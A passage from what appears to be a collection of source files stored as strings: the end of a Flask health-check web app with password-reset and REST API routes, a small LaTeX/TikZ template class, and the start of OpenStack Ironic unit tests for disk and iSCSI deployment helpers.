redirect(url_for(\'reset_req\', lang=g.current_lang))\n\n # Token received: verify if ok, may also time-out.\n registered_user = User.verify_token(token)\n if registered_user is None:\n LOGGER.warn(\'Cannot find User from token: %s\' % token)\n flash(gettext(\'Invalid token\'), \'danger\')\n return redirect(url_for(\'login\', lang=g.current_lang))\n\n # Token and user ok: return reset form.\n if request.method == \'GET\':\n return render_template(\'reset_password_form.html\')\n\n # Valid token and user: change password from form-value\n password = request.form[\'password\']\n if not password:\n flash(gettext(\'Password required\'), \'danger\')\n return redirect(url_for(\'reset/%s\' % token, lang=g.current_lang))\n registered_user.set_password(password)\n DB.session.add(registered_user)\n\n try:\n DB.session.commit()\n flash(gettext(\'Update password OK\'), \'success\')\n except Exception as err:\n msg = \'Update password failed!\'\n LOGGER.warn(msg + \' err=\' + str(err))\n DB.session.rollback()\n flash(gettext(msg), \'danger\')\n\n # Finally redirect user to login page\n return redirect(url_for(\'login\', lang=g.current_lang))\n\n\n#\n# REST Interface Calls\n#\n\n@APP.route(\'/api/v1.0/summary\')\n@APP.route(\'/api/v1.0/summary/\')\n@APP.route(\'/api/v1.0/summary.\')\ndef api_summary(content_type=\'json\'):\n """"""\n Get health summary for all Resources within this instance.\n """"""\n\n health_summary = views.get_health_summary()\n\n # Convert Runs to dict-like structure\n for run in [\'first_run\', \'last_run\']:\n run_obj = health_summary.get(run, None)\n if run_obj:\n health_summary[run] = run_obj.for_json()\n\n # Convert Resources failing to dict-like structure\n failed_resources = []\n for resource in health_summary[\'failed_resources\']:\n failed_resources.append(resource.for_json())\n health_summary[\'failed_resources\'] = failed_resources\n\n if content_type == \'json\':\n result = jsonify(health_summary)\n else:\n result = \'
<pre>\\n%s\\n</pre>
\' % \\\n render_template(\'status_report_email.txt\',\n lang=g.current_lang, summary=health_summary)\n return result\n\n\n@APP.route(\'/api/v1.0/probes-avail/\')\n@APP.route(\'/api/v1.0/probes-avail/\')\n@APP.route(\'/api/v1.0/probes-avail//\')\ndef api_probes_avail(resource_type=None, resource_id=None):\n """"""\n Get available (configured) Probes for this\n installation, optional for resource type\n """"""\n resource = None\n if resource_id:\n resource = views.get_resource_by_id(resource_id)\n\n probes = views.get_probes_avail(resource_type=resource_type,\n resource=resource)\n return jsonify(probes)\n\n\n@APP.route(\'/api/v1.0/runs/\')\n@APP.route(\'/api/v1.0/runs/.\')\n@APP.route(\'/api/v1.0/runs//\')\n@APP.route(\'/api/v1.0/runs//.\')\ndef api_runs(resource_id, run_id=None, content_type=\'json\'):\n """"""\n Get Runs (History of results) for Resource.\n """"""\n if run_id:\n runs = [views.get_run_by_id(run_id)]\n else:\n runs = views.get_run_by_resource_id(resource_id)\n\n run_arr = []\n for run in runs:\n run_dict = {\n \'id\': run.identifier,\n \'success\': run.success,\n \'response_time\': run.response_time,\n \'checked_datetime\': run.checked_datetime,\n \'message\': run.message,\n \'report\': run.report\n }\n run_arr.append(run_dict)\n\n runs_dict = {\'total\': len(run_arr), \'runs\': run_arr}\n result = \'unknown\'\n if content_type == \'json\':\n result = jsonify(runs_dict)\n elif content_type == \'html\':\n result = render_template(\'includes/runs.html\',\n lang=g.current_lang, runs=runs_dict[\'runs\'])\n return result\n\n\nif __name__ == \'__main__\': # run locally, for fun\n import sys\n\n HOST = \'127.0.0.1\'\n PORT = 8000\n if len(sys.argv) > 1:\n HOST, PORT = sys.argv[1].split(\':\')\n APP.run(host=HOST, port=int(PORT), use_reloader=True, debug=True)\n', '# Copyright 2012 (C) Mickael Menu dummy@email.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program. 
If not, see .\n\nfrom string import Template\n\nfrom .tags import *\n\n\nclass FileTemplate(object):\n\t""""""\n\tThe file template tool generates a full LaTeX/TikZ source from a template, preamble\n\tand source.\n\t""""""\n\tdef __init__(self, template, preamble, source):\n\t\tassert preamble is not None and source is not None\n\t\tsuper(FileTemplate, self).__init__()\n\t\tself.content = """"\n\t\tself.preamble = preamble\n\t\tself.source = source\n\t\tself.latex_template = Template(template)\n\n\tdef buildFileContent(self):\n\t\t""""""\n\t\tBuilds the TikZ document with given preamble and source and the document template.\n\t\t""""""\n\t\tself._buildPreambleChunk()\n\t\tself._buildSourceChunk()\n\t\tself._buildContentFromTemplate()\n\t\treturn self.content\n\n\tdef _buildPreambleChunk(self):\n\t\tself.preamble = ""%s\\n%s\\n%s\\n"" % (PREAMBLE_BEGIN_TAG, self.preamble, PREAMBLE_END_TAG)\n\n\tdef _buildSourceChunk(self):\n\t\tself.source = ""%s\\n%s\\n%s\\n"" % (SOURCE_BEGIN_TAG, self.source, SOURCE_END_TAG)\n\n\tdef _buildContentFromTemplate(self):\n\t\tself.content = TIKZ_TAG + ""\\n""\n\t\tself.content += self.latex_template.safe_substitute(PREAMBLE=self.preamble, SOURCE=self.source)\n', '# Copyright (c) 2012 NTT DOCOMO, INC.\n# Copyright 2011 OpenStack Foundation\n# Copyright 2011 Ilya Alekseyev\n#\n# Licensed under the Apache License, Version 2.0 (the ""License""); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport base64\nimport gzip\nimport os\nimport shutil\nimport stat\nimport tempfile\nimport time\nimport types\n\nimport mock\nfrom oslo_concurrency import processutils\nfrom oslo_config import cfg\nfrom oslo_utils import uuidutils\nimport requests\nimport testtools\n\nfrom ironic.common import boot_devices\nfrom ironic.common import disk_partitioner\nfrom ironic.common import exception\nfrom ironic.common import images\nfrom ironic.common import states\nfrom ironic.common import utils as common_utils\nfrom ironic.conductor import task_manager\nfrom ironic.conductor import utils as manager_utils\nfrom ironic.drivers.modules import agent_client\nfrom ironic.drivers.modules import deploy_utils as utils\nfrom ironic.drivers.modules import image_cache\nfrom ironic.tests import base as tests_base\nfrom ironic.tests.conductor import utils as mgr_utils\nfrom ironic.tests.db import base as db_base\nfrom ironic.tests.db import utils as db_utils\nfrom ironic.tests.objects import utils as obj_utils\n\n_PXECONF_DEPLOY = b""""""\ndefault deploy\n\nlabel deploy\nkernel deploy_kernel\nappend initrd=deploy_ramdisk\nipappend 3\n\nlabel boot_partition\nkernel kernel\nappend initrd=ramdisk root={{ ROOT }}\n\nlabel boot_whole_disk\nCOM32 chain.c32\nappend mbr:{{ DISK_IDENTIFIER }}\n""""""\n\n_PXECONF_BOOT_PARTITION = """"""\ndefault boot_partition\n\nlabel deploy\nkernel deploy_kernel\nappend initrd=deploy_ramdisk\nipappend 3\n\nlabel boot_partition\nkernel kernel\nappend initrd=ramdisk root=UUID=12345678-1234-1234-1234-1234567890abcdef\n\nlabel boot_whole_disk\nCOM32 chain.c32\nappend mbr:{{ DISK_IDENTIFIER }}\n""""""\n\n_PXECONF_BOOT_WHOLE_DISK = """"""\ndefault 
boot_whole_disk\n\nlabel deploy\nkernel deploy_kernel\nappend initrd=deploy_ramdisk\nipappend 3\n\nlabel boot_partition\nkernel kernel\nappend initrd=ramdisk root={{ ROOT }}\n\nlabel boot_whole_disk\nCOM32 chain.c32\nappend mbr:0x12345678\n""""""\n\n_IPXECONF_DEPLOY = b""""""\n#!ipxe\n\ndhcp\n\ngoto deploy\n\n:deploy\nkernel deploy_kernel\ninitrd deploy_ramdisk\nboot\n\n:boot_partition\nkernel kernel\nappend initrd=ramdisk root={{ ROOT }}\nboot\n\n:boot_whole_disk\nkernel chain.c32\nappend mbr:{{ DISK_IDENTIFIER }}\nboot\n""""""\n\n_IPXECONF_BOOT_PARTITION = """"""\n#!ipxe\n\ndhcp\n\ngoto boot_partition\n\n:deploy\nkernel deploy_kernel\ninitrd deploy_ramdisk\nboot\n\n:boot_partition\nkernel kernel\nappend initrd=ramdisk root=UUID=12345678-1234-1234-1234-1234567890abcdef\nboot\n\n:boot_whole_disk\nkernel chain.c32\nappend mbr:{{ DISK_IDENTIFIER }}\nboot\n""""""\n\n_IPXECONF_BOOT_WHOLE_DISK = """"""\n#!ipxe\n\ndhcp\n\ngoto boot_whole_disk\n\n:deploy\nkernel deploy_kernel\ninitrd deploy_ramdisk\nboot\n\n:boot_partition\nkernel kernel\nappend initrd=ramdisk root={{ ROOT }}\nboot\n\n:boot_whole_disk\nkernel chain.c32\nappend mbr:0x12345678\nboot\n""""""\n\n_UEFI_PXECONF_DEPLOY = b""""""\ndefault=deploy\n\nimage=deploy_kernel\n label=deploy\n initrd=deploy_ramdisk\n append=""ro text""\n\nimage=kernel\n label=boot_partition\n initrd=ramdisk\n append=""root={{ ROOT }}""\n\nimage=chain.c32\n label=boot_whole_disk\n append=""mbr:{{ DISK_IDENTIFIER }}""\n""""""\n\n_UEFI_PXECONF_BOOT_PARTITION = """"""\ndefault=boot_partition\n\nimage=deploy_kernel\n label=deploy\n initrd=deploy_ramdisk\n append=""ro text""\n\nimage=kernel\n label=boot_partition\n initrd=ramdisk\n append=""root=UUID=12345678-1234-1234-1234-1234567890abcdef""\n\nimage=chain.c32\n label=boot_whole_disk\n append=""mbr:{{ DISK_IDENTIFIER }}""\n""""""\n\n_UEFI_PXECONF_BOOT_WHOLE_DISK = """"""\ndefault=boot_whole_disk\n\nimage=deploy_kernel\n label=deploy\n initrd=deploy_ramdisk\n append=""ro text""\n\nimage=kernel\n label=boot_partition\n initrd=ramdisk\n append=""root={{ ROOT }}""\n\nimage=chain.c32\n label=boot_whole_disk\n append=""mbr:0x12345678""\n""""""\n\n\n@mock.patch.object(time, \'sleep\', lambda seconds: None)\nclass PhysicalWorkTestCase(tests_base.TestCase):\n\n def _mock_calls(self, name_list):\n patch_list = [mock.patch.object(utils, name,\n spec_set=types.FunctionType)\n for name in name_list]\n mock_list = [patcher.start() for patcher in patch_list]\n for patcher in patch_list:\n self.addCleanup(patcher.stop)\n\n parent_mock = mock.MagicMock(spec=[])\n for mocker, name in zip(mock_list, name_list):\n parent_mock.attach_mock(mocker, name)\n return parent_mock\n\n def _test_deploy_partition_image(self, boot_option=None, boot_mode=None):\n """"""Check loosely all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 64\n ephemeral_mb = 0\n ephemeral_format = None\n configdrive_mb = 0\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n swap_part = \'/dev/fake-part1\'\n root_part = \'/dev/fake-part2\'\n root_uuid = \'12345678-1234-1234-12345678-12345678abcdef\'\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'make_partitions\',\n \'is_block_device\', \'populate_image\', \'mkfs\',\n \'block_uuid\', \'notify\', \'destroy_disk_metadata\']\n parent_mock = self._mock_calls(name_list)\n 
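# Stub the deploy helpers: a fake block device, a 1 MB image (which fits\n # the 128 MB root partition) and the partition map make_partitions() returns.\n 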
parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.is_block_device.return_value = True\n parent_mock.block_uuid.return_value = root_uuid\n parent_mock.make_partitions.return_value = {\'root\': root_part,\n \'swap\': swap_part}\n\n make_partitions_expected_args = [dev, root_mb, swap_mb, ephemeral_mb,\n configdrive_mb]\n make_partitions_expected_kwargs = {\'commit\': True}\n deploy_kwargs = {}\n\n if boot_option:\n make_partitions_expected_kwargs[\'boot_option\'] = boot_option\n deploy_kwargs[\'boot_option\'] = boot_option\n else:\n make_partitions_expected_kwargs[\'boot_option\'] = \'netboot\'\n\n if boot_mode:\n make_partitions_expected_kwargs[\'boot_mode\'] = boot_mode\n deploy_kwargs[\'boot_mode\'] = boot_mode\n else:\n make_partitions_expected_kwargs[\'boot_mode\'] = \'bios\'\n\n # If no boot_option, then it should default to netboot.\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.destroy_disk_metadata(dev, node_uuid),\n mock.call.make_partitions(\n *make_partitions_expected_args,\n **make_partitions_expected_kwargs),\n mock.call.is_block_device(root_part),\n mock.call.is_block_device(swap_part),\n mock.call.populate_image(image_path, root_part),\n mock.call.mkfs(dev=swap_part, fs=\'swap\',\n label=\'swap1\'),\n mock.call.block_uuid(root_part),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuids_dict_returned = utils.deploy_partition_image(\n address, port, iqn, lun, image_path, root_mb, swap_mb,\n ephemeral_mb, ephemeral_format, node_uuid, **deploy_kwargs)\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n expected_uuid_dict = {\n \'root uuid\': root_uuid,\n \'efi system partition uuid\': None}\n self.assertEqual(expected_uuid_dict, uuids_dict_returned)\n\n def test_deploy_partition_image_without_boot_option(self):\n self._test_deploy_partition_image()\n\n def test_deploy_partition_image_netboot(self):\n self._test_deploy_partition_image(boot_option=""netboot"")\n\n def test_deploy_partition_image_localboot(self):\n self._test_deploy_partition_image(boot_option=""local"")\n\n def test_deploy_partition_image_wo_boot_option_and_wo_boot_mode(self):\n self._test_deploy_partition_image()\n\n def test_deploy_partition_image_netboot_bios(self):\n self._test_deploy_partition_image(boot_option=""netboot"",\n boot_mode=""bios"")\n\n def test_deploy_partition_image_localboot_bios(self):\n self._test_deploy_partition_image(boot_option=""local"",\n boot_mode=""bios"")\n\n def test_deploy_partition_image_netboot_uefi(self):\n self._test_deploy_partition_image(boot_option=""netboot"",\n boot_mode=""uefi"")\n\n @mock.patch.object(utils, \'get_image_mb\', return_value=129, autospec=True)\n def test_deploy_partition_image_image_exceeds_root_partition(self,\n gim_mock):\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 64\n ephemeral_mb = 0\n ephemeral_format = None\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n self.assertRaises(exception.InstanceDeployFailure,\n utils.deploy_partition_image, address, port, iqn,\n lun, image_path, root_mb, swap_mb, ephemeral_mb,\n ephemeral_format, node_uuid)\n\n gim_mock.assert_called_once_with(image_path)\n\n # We mock utils.block_uuid separately here because we can\'t predict\n # the 
order in which it will be called.\n @mock.patch.object(utils, \'block_uuid\', autospec=True)\n def test_deploy_partition_image_localboot_uefi(self, block_uuid_mock):\n """"""Check loosely all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 64\n ephemeral_mb = 0\n ephemeral_format = None\n configdrive_mb = 0\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n swap_part = \'/dev/fake-part2\'\n root_part = \'/dev/fake-part3\'\n efi_system_part = \'/dev/fake-part1\'\n root_uuid = \'12345678-1234-1234-12345678-12345678abcdef\'\n efi_system_part_uuid = \'9036-482\'\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'make_partitions\',\n \'is_block_device\', \'populate_image\', \'mkfs\',\n \'notify\', \'destroy_disk_metadata\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.is_block_device.return_value = True\n\n def block_uuid_side_effect(device):\n if device == root_part:\n return root_uuid\n if device == efi_system_part:\n return efi_system_part_uuid\n\n block_uuid_mock.side_effect = block_uuid_side_effect\n parent_mock.make_partitions.return_value = {\n \'root\': root_part, \'swap\': swap_part,\n \'efi system partition\': efi_system_part}\n\n # If no boot_option, then it should default to netboot.\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.destroy_disk_metadata(dev, node_uuid),\n mock.call.make_partitions(dev, root_mb, swap_mb,\n ephemeral_mb,\n configdrive_mb,\n commit=True,\n boot_option=""local"",\n boot_mode=""uefi""),\n mock.call.is_block_device(root_part),\n mock.call.is_block_device(swap_part),\n mock.call.is_block_device(efi_system_part),\n mock.call.mkfs(dev=efi_system_part, fs=\'vfat\',\n label=\'efi-part\'),\n mock.call.populate_image(image_path, root_part),\n mock.call.mkfs(dev=swap_part, fs=\'swap\',\n label=\'swap1\'),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuid_dict_returned = utils.deploy_partition_image(\n address, port, iqn, lun, image_path, root_mb, swap_mb,\n ephemeral_mb, ephemeral_format, node_uuid, boot_option=""local"",\n boot_mode=""uefi"")\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n block_uuid_mock.assert_any_call(\'/dev/fake-part1\')\n block_uuid_mock.assert_any_call(\'/dev/fake-part3\')\n expected_uuid_dict = {\n \'root uuid\': root_uuid,\n \'efi system partition uuid\': efi_system_part_uuid}\n self.assertEqual(expected_uuid_dict, uuid_dict_returned)\n\n def test_deploy_partition_image_without_swap(self):\n """"""Check loosely all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 0\n ephemeral_mb = 0\n ephemeral_format = None\n configdrive_mb = 0\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n root_part = \'/dev/fake-part1\'\n root_uuid = \'12345678-1234-1234-12345678-12345678abcdef\'\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'make_partitions\',\n 
\'is_block_device\', \'populate_image\', \'block_uuid\',\n \'notify\', \'destroy_disk_metadata\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.is_block_device.return_value = True\n parent_mock.block_uuid.return_value = root_uuid\n parent_mock.make_partitions.return_value = {\'root\': root_part}\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.destroy_disk_metadata(dev, node_uuid),\n mock.call.make_partitions(dev, root_mb, swap_mb,\n ephemeral_mb,\n configdrive_mb,\n commit=True,\n boot_option=""netboot"",\n boot_mode=""bios""),\n mock.call.is_block_device(root_part),\n mock.call.populate_image(image_path, root_part),\n mock.call.block_uuid(root_part),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuid_dict_returned = utils.deploy_partition_image(address, port, iqn,\n lun, image_path,\n root_mb, swap_mb,\n ephemeral_mb,\n ephemeral_format,\n node_uuid)\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n self.assertEqual(root_uuid, uuid_dict_returned[\'root uuid\'])\n\n def test_deploy_partition_image_with_ephemeral(self):\n """"""Check loosely all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 64\n ephemeral_mb = 256\n configdrive_mb = 0\n ephemeral_format = \'exttest\'\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n ephemeral_part = \'/dev/fake-part1\'\n swap_part = \'/dev/fake-part2\'\n root_part = \'/dev/fake-part3\'\n root_uuid = \'12345678-1234-1234-12345678-12345678abcdef\'\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'make_partitions\',\n \'is_block_device\', \'populate_image\', \'mkfs\',\n \'block_uuid\', \'notify\', \'destroy_disk_metadata\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.is_block_device.return_value = True\n parent_mock.block_uuid.return_value = root_uuid\n parent_mock.make_partitions.return_value = {\'swap\': swap_part,\n \'ephemeral\': ephemeral_part,\n \'root\': root_part}\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.destroy_disk_metadata(dev, node_uuid),\n mock.call.make_partitions(dev, root_mb, swap_mb,\n ephemeral_mb,\n configdrive_mb,\n commit=True,\n boot_option=""netboot"",\n boot_mode=""bios""),\n mock.call.is_block_device(root_part),\n mock.call.is_block_device(swap_part),\n mock.call.is_block_device(ephemeral_part),\n mock.call.populate_image(image_path, root_part),\n mock.call.mkfs(dev=swap_part, fs=\'swap\',\n label=\'swap1\'),\n mock.call.mkfs(dev=ephemeral_part,\n fs=ephemeral_format,\n label=\'ephemeral0\'),\n mock.call.block_uuid(root_part),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuid_dict_returned = utils.deploy_partition_image(address, port, iqn,\n lun, image_path,\n root_mb, swap_mb,\n ephemeral_mb,\n ephemeral_format,\n node_uuid)\n\n 
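# mock_calls on the shared parent mock preserves ordering across all the\n # attached helpers, so this asserts both the arguments and the exact\n # call sequence.\n 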
self.assertEqual(calls_expected, parent_mock.mock_calls)\n self.assertEqual(root_uuid, uuid_dict_returned[\'root uuid\'])\n\n def test_deploy_partition_image_preserve_ephemeral(self):\n """"""Check if all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 64\n ephemeral_mb = 256\n ephemeral_format = \'exttest\'\n configdrive_mb = 0\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n ephemeral_part = \'/dev/fake-part1\'\n swap_part = \'/dev/fake-part2\'\n root_part = \'/dev/fake-part3\'\n root_uuid = \'12345678-1234-1234-12345678-12345678abcdef\'\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'make_partitions\',\n \'is_block_device\', \'populate_image\', \'mkfs\',\n \'block_uuid\', \'notify\', \'get_dev_block_size\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.is_block_device.return_value = True\n parent_mock.block_uuid.return_value = root_uuid\n parent_mock.make_partitions.return_value = {\'swap\': swap_part,\n \'ephemeral\': ephemeral_part,\n \'root\': root_part}\n parent_mock.block_uuid.return_value = root_uuid\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.make_partitions(dev, root_mb, swap_mb,\n ephemeral_mb,\n configdrive_mb,\n commit=False,\n boot_option=""netboot"",\n boot_mode=""bios""),\n mock.call.is_block_device(root_part),\n mock.call.is_block_device(swap_part),\n mock.call.is_block_device(ephemeral_part),\n mock.call.populate_image(image_path, root_part),\n mock.call.mkfs(dev=swap_part, fs=\'swap\',\n label=\'swap1\'),\n mock.call.block_uuid(root_part),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuid_dict_returned = utils.deploy_partition_image(\n address, port, iqn, lun, image_path, root_mb, swap_mb,\n ephemeral_mb, ephemeral_format, node_uuid,\n preserve_ephemeral=True, boot_option=""netboot"")\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n self.assertFalse(parent_mock.get_dev_block_size.called)\n self.assertEqual(root_uuid, uuid_dict_returned[\'root uuid\'])\n\n @mock.patch.object(common_utils, \'unlink_without_raise\', autospec=True)\n def test_deploy_partition_image_with_configdrive(self, mock_unlink):\n """"""Check loosely all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 0\n ephemeral_mb = 0\n configdrive_mb = 10\n ephemeral_format = None\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n configdrive_url = \'http://127.0.0.1/cd\'\n\n dev = \'/dev/fake\'\n configdrive_part = \'/dev/fake-part1\'\n root_part = \'/dev/fake-part2\'\n root_uuid = \'12345678-1234-1234-12345678-12345678abcdef\'\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'make_partitions\',\n \'is_block_device\', \'populate_image\', \'block_uuid\',\n \'notify\', \'destroy_disk_metadata\', \'dd\',\n \'_get_configdrive\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n 
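# The configdrive is fetched via the mocked _get_configdrive(), dd\'d onto\n # its own partition, and the temporary file is unlinked afterwards.\n 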
parent_mock.get_image_mb.return_value = 1\n parent_mock.is_block_device.return_value = True\n parent_mock.block_uuid.return_value = root_uuid\n parent_mock.make_partitions.return_value = {\'root\': root_part,\n \'configdrive\':\n configdrive_part}\n parent_mock._get_configdrive.return_value = (10, \'configdrive-path\')\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.destroy_disk_metadata(dev, node_uuid),\n mock.call._get_configdrive(configdrive_url,\n node_uuid),\n mock.call.make_partitions(dev, root_mb, swap_mb,\n ephemeral_mb,\n configdrive_mb,\n commit=True,\n boot_option=""netboot"",\n boot_mode=""bios""),\n mock.call.is_block_device(root_part),\n mock.call.is_block_device(configdrive_part),\n mock.call.dd(mock.ANY, configdrive_part),\n mock.call.populate_image(image_path, root_part),\n mock.call.block_uuid(root_part),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuid_dict_returned = utils.deploy_partition_image(\n address, port, iqn, lun, image_path, root_mb, swap_mb,\n ephemeral_mb, ephemeral_format, node_uuid,\n configdrive=configdrive_url)\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n self.assertEqual(root_uuid, uuid_dict_returned[\'root uuid\'])\n mock_unlink.assert_called_once_with(\'configdrive-path\')\n\n @mock.patch.object(utils, \'get_disk_identifier\', autospec=True)\n def test_deploy_whole_disk_image(self, mock_gdi):\n """"""Check loosely all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n name_list = [\'get_dev\', \'discovery\', \'login_iscsi\', \'logout_iscsi\',\n \'delete_iscsi\', \'is_block_device\', \'populate_image\',\n \'notify\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n parent_mock.is_block_device.return_value = True\n mock_gdi.return_value = \'0x12345678\'\n calls_expected = [mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.populate_image(image_path, dev),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuid_dict_returned = utils.deploy_disk_image(address, port, iqn, lun,\n image_path, node_uuid)\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n self.assertEqual(\'0x12345678\', uuid_dict_returned[\'disk identifier\'])\n\n @mock.patch.object(common_utils, \'execute\', autospec=True)\n def test_verify_iscsi_connection_raises(self, mock_exec):\n iqn = \'iqn.xyz\'\n mock_exec.return_value = [\'iqn.abc\', \'\']\n self.assertRaises(exception.InstanceDeployFailure,\n utils.verify_iscsi_connection, iqn)\n self.assertEqual(3, mock_exec.call_count)\n\n @mock.patch.object(os.path, \'exists\', autospec=True)\n def test_check_file_system_for_iscsi_device_raises(self, mock_os):\n iqn = \'iqn.xyz\'\n ip = ""127.0.0.1""\n port = ""22""\n mock_os.return_value = False\n self.assertRaises(exception.InstanceDeployFailure,\n utils.check_file_system_for_iscsi_device, ip, port, iqn)\n self.assertEqual(3, mock_os.call_count)\n\n @mock.patch.object(os.path, \'exists\', autospec=True)\n def test_check_file_system_for_iscsi_device(self, 
